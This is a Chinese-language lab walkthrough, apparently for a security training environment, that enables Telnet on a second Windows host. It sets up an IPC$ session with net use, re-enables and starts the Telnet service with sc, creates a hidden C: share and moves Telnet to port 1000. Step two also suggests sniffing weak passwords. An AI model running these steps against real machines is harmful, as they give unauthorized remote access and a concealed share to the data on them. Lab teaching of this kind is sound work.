實驗步驟一

本地開啟Telnet服務

進入主機A，右鍵“我的電腦”->管理->服務和應用程式->服務，找到Telnet服務，雙擊，將啟動型別改為“手動”

實驗步驟二

遠端開啟Telnet服務

（1）首先用流光嗅探等工具探得到對方密碼，主要是弱口令（此步可跳過，用已知的實驗機使用者名稱密碼進行試驗）。

（2）在主機B的“控制面板-工具-資料夾選項-檢視-簡單的檔案共享”去掉選取。

3）右鍵“我的電腦”->管理->服務和應用程式->服務，找到Telnet服務，關閉之：

（4）回到主機A用net use命令建立ipc$連線（主機使用者名稱密碼可在實驗環境右側“切換”滑鼠懸浮時看到）

命令：net use \\10.1.1.119\ipc$ "主機B的密碼" /user:administrator

（5）用sc命令把禁用的telnet服務變成自動

命令：sc \\10.1.1.119 config tlntsvr start= auto

（6）在主機B上可以檢視telnet的啟動型別已經變為自動：

（7）用sc命令將telnet啟動

命令：sc \\10.1.1.119 start tlntsvr

在主機B上可以檢視telnet服務已經啟動：

（8）新建一個cmd環境進行telnet登入：telnet 10.1.1.119

（9）登入後便可進行共享等相關操作，net share建立c$共享

命令：net share abc$=c:

檢視共享目錄：net share

（10）遠端更改telnet埠

輸入tlntadmn \\10.1.1.119 config port=1000 -u administrator -p 主機B的密碼

再次進行telnet連線，則使用埠1000。